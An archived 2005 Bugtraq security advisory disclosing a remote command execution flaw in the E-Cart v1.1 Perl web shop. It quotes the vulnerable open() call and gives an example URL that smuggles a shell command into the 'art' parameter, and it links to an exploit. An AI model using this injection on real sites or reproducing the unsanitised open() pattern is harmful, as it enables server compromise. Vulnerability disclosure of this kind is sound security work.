lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 23 Apr 2005 14:24:29 -0300
From: Nicolas Montoza <xonico@...il.com>
To: bugtraq@...urityfocus.com, news@...uriteam.com,
	bugs@...uritytracker.com, submissions@...ketstormsecurity.org,
	vuln@...unia.com
Subject: E-Cart v1.1 Remote Command Execution


============================================================
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================

============================================================
*Summary
E-Cart is a mod of WepApp written in Perl. It is WebShop.
============================================================
*Problem Description:

The bug is in the file index.cgi where the variable art that is put
under "open()", does
not have a control of data, allowing to the attacker to execute any
type of commands.

Vulnerable code
---------------
sub viewart {
   &cartfooter;
   open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA);
chomp(@data = <DATA>); release(DATA); close(DATA);
       ...
       ...
       ...

============================================================

*Example:

http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|

============================================================

*Xpl:

http://www.soulblack.com.ar/repo/tools/ecart-xpl.php

============================================================

*Fix:

Contact the Vendor.
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ